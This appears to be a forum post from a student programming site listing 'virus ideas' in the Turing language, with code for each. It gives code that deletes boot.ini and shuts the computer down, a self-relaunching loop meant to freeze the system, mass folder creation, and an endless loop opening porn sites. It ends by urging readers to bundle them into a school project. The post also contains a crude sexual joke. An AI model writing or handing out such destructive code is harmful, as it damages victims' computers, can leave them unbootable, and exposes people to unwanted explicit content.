Virus Ideas.
-Make a program that deletes boot.ini and turns off your computer.
code: |
Dir.Change ("C:\\")
File.Delete("boot.ini")
put Sys.Exec ("C:\\Windows\\Shutdown.exe")
%Goodbye computer |
-Make a program that runs itself. Over and over and over (you've got to compile it to do this)
code: |
loop
put Sys.Exec ("ThisFile.Exe")
end loop |
Your computer will lock up like a nervous virgin on prom night.
-Make a bunch of folders
code: |
Dir.Change("C:\\")
for i:1..maxint
Dir.Create (intstr(i))
end for |
-Fun with pop up windows.
code: |
var site : array 1..whatever of string := init ("www.porn.com", a bunch more porn sites)
loop
if Sys.Exec (site (Rand.Int(1,upper(site)))) then
end if
end loop |
Make a collection of these for an...'alternet' ISU ![Twisted Evil Twisted Evil](http://compsci.ca/v3/images/smiles/icon_twisted.gif)